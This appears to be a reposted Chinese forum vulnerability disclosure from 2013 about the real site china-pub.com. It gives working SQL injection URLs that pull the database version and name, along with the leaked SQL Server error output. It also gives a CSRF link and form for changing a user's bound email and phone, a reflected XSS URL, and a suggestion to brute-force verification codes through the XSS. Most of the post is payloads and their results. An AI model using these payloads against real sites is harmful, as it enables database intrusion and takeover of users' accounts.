|
|
中國互動出版網SQL注入漏洞�、csrf修改綁定郵箱、反射型xss
灰鴿子 本文轉載。
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)
May 3 2005 23:18:38
Copyright (c) 1988-2003 Microsoft Corporation
Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
GET請求CSRF:
http://www.china-pub.com/member/ ... ail=yourmail@qq.com
XSS:
http://www.china-pub.com/member/ ... 0src=http://g.cn%3E
綁定手機號CSRF���,發送驗證碼的操作可以通過XSS調用:
<form action="http://www.china-pub.com/member/mypub2010/user/ver_tel.asp" method="post">
<input name="ym" value="3124"/>
<input name="yz" value="2"/>
<input name="x" value="65"/>
<input name="y" value="26" type="submit"/>
</form>
利用上面的XSS從1-10000頭到尾POST一遍估計就出來了
漏洞證明:http://member.china-pub.com/Car/OrderDetail.aspx?o=4206136 and 1=(select @@VERSION)
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)
May 3 2005 23:18:38
Copyright (c) 1988-2003 Microsoft Corporation
Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
http://member.china-pub.com/Car/OrderDetail.aspx?o=4206136 And 1=(select db_name())
dbinfo
http://member.china-pub.com/Car/ ... 20OR%204206137%22--
字符串 '-- and member='awsotr' order by cpub_shopping_member_info.orderid desc' 之前有未閉合的引號。
第 1 行: '-- and member='awsotr' order by cpub_shopping_member_info.orderid desc' 附近有語法錯誤。
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: 字符串 '-- and member='awsotr' order by cpub_shopping_member_info.orderid desc' 之前有未閉合的引號���。
第 1 行: '-- and member='awsotr' order by cpub_shopping_member_info.orderid desc' 附近有語法錯誤。
1.jpg (55.53 KB, 下載次數: 521)
下載附件
灰鴿子
2013-4-29 20:12 上傳
|
|
加載中...
發表于 2013-4-29 20:12:58
QQ好友和群
收藏
發表于 2013-5-3 00:15:41